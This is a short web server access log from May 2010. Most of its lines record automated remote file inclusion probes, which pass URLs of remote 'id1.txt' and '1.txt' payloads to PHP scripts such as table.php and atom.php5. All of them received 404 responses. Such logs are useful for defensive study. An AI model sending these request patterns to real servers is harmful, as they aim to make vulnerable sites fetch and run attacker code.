121.190.102.21 - - [04/May/2010:17:22:39 -0500] "GET /logs//include/inc_ext/spaw/dialogs/table.php?spaw_root=http://nic.bupt.edu.cn/media/id1.txt? HTTP/1.1" 404 328 "-""Mozilla/5.0"
121.190.102.21 - - [04/May/2010:17:22:39 -0500] "GET //include/inc_ext/spaw/dialogs/table.php?spaw_root=http://nic.bupt.edu.cn/media/id1.txt? HTTP/1.1" 404 323 "-""Mozilla/5.0"
121.190.102.21 - - [04/May/2010:17:22:39 -0500] "GET /logs/access_log.1268956800%20%20//include/inc_ext/spaw/dialogs/table.php?spaw_root=http://nic.bupt.edu.cn/media/id1.txt? HTTP/1.1" 404 352 "-""Mozilla/5.0"
87.250.255.243 - - [04/May/2010:17:23:18 -0500] "GET /logs/access_log.1215907200 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
123.30.181.5 - - [04/May/2010:17:24:37 -0500] "GET /logs//atom.php5?page=http://www.sly8.com/sly8//bbs/id1.txt? HTTP/1.1" 404 299 "-""Mozilla/5.0"
123.30.181.5 - - [04/May/2010:17:24:37 -0500] "GET /logs/access_log.1263600000//atom.php5?page=http://www.sly8.com/sly8//bbs/id1.txt? HTTP/1.1" 404 321 "-""Mozilla/5.0"
123.30.181.5 - - [04/May/2010:17:24:37 -0500] "GET //atom.php5?page=http://www.sly8.com/sly8//bbs/id1.txt? HTTP/1.1" 404 294 "-""Mozilla/5.0"
123.30.181.5 - - [04/May/2010:17:24:37 -0500] "GET /logs/access_log.1266537600//atom.php5?page=http://www.sly8.com/sly8//bbs/id1.txt? HTTP/1.1" 404 321 "-""Mozilla/5.0"
164.77.228.201 - - [04/May/2010:17:24:56 -0500] "GET /logs//atom.php5?page=http://www.boomong.com/bbs//data/1.txt??? HTTP/1.1" 404 299 "-""Mozilla/5.0"
164.77.228.201 - - [04/May/2010:17:24:56 -0500] "GET //atom.php5?page=http://www.boomong.com/bbs//data/1.txt??? HTTP/1.1" 404 294 "-""Mozilla/5.0"
164.77.228.201 - - [04/May/2010:17:24:56 -0500] "GET /logs/access_log.1263600000//atom.php5?page=http://www.boomong.com/bbs//data/1.txt??? HTTP/1.1" 404 321 "-""Mozilla/5.0"
164.77.228.201 - - [04/May/2010:17:24:58 -0500] "GET /logs/access_log.1265068800//atom.php5?page=http://www.boomong.com/bbs//data/1.txt??? HTTP/1.1" 404 321 "-""Mozilla/5.0"
